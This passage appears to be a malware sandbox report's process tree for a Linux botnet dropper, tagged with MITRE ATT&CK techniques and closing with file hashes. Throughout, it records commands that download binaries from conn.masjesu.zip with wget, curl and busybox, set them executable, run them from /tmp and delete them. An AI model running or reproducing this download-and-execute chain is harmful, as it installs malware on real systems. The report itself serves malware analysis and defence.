/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- System Network Configuration Discovery
PID:951
-
-
/bin/chmodchmod 777 KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj./KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm KtV8T5zTu7QiVqRc8UHIEma3TOFeTUG0wj2⤵PID:954
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- System Network Configuration Discovery
PID:955
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- System Network Configuration Discovery
PID:958
-
-
/bin/chmodchmod 777 IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy./IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm IdRS9nBDHnZD8p101yno4K0ZpPPOp7HROy2⤵PID:961
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- System Network Configuration Discovery
PID:962
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- System Network Configuration Discovery
PID:965
-
-
/bin/chmodchmod 777 IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc./IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm IXu4NKim69GhfvWnrY8TwQfD0wCsFWL2pc2⤵PID:968
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- System Network Configuration Discovery
PID:969
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:972
-
-
/bin/chmodchmod 777 XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF5./XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm XrxFEUmIkSPL2gpsWYGKA4GUVIwMDVApF52⤵PID:975
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:976
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- System Network Configuration Discovery
PID:979
-
-
/bin/chmodchmod 777 GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B./GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm GKyWNiCoJn86WBFRFfBxcd3ee3bCMAF32B2⤵PID:982
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:983
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:984
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- System Network Configuration Discovery
PID:986
-
-
/bin/chmodchmod 777 GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- File and Directory Permissions Modification
PID:987
-
-
/tmp/GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg./GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵
- Executes dropped EXE
PID:988
-
-
/bin/rmrm GNUqi1zjsQ4wvDxdXdJvuBXUr67j04Muzg2⤵PID:989
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:990
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:991
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:993
-
-
/bin/chmodchmod 777 Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw./Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm Rr60caTAb3M8kV1AQcFhDtoAJiJdbxhVlw2⤵PID:996
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- System Network Configuration Discovery
PID:997
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- System Network Configuration Discovery
PID:1000
-
-
/bin/chmodchmod 777 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- File and Directory Permissions Modification
PID:1001
-
-
/tmp/3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH./3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵
- Executes dropped EXE
PID:1002
-
-
/bin/rmrm 3aNSf0BpemYuLYcNWfErzLnH5C7UtSIHTH2⤵PID:1003
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- System Network Configuration Discovery
PID:1004
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1005
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- System Network Configuration Discovery
PID:1007
-
-
/bin/chmodchmod 777 q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- File and Directory Permissions Modification
PID:1008
-
-
/tmp/q8by6B3GMmnW2fqzokCod3DStJogu7sm1h./q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵
- Executes dropped EXE
PID:1009
-
-
/bin/rmrm q8by6B3GMmnW2fqzokCod3DStJogu7sm1h2⤵PID:1010
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:1011
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1012
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- System Network Configuration Discovery
PID:1014
-
-
/bin/chmodchmod 777 eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- File and Directory Permissions Modification
PID:1015
-
-
/tmp/eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM./eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵
- Executes dropped EXE
PID:1016
-
-
/bin/rmrm eIDn1FWa483JBcYsoWG96lTXfQiBNztHPM2⤵PID:1017
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97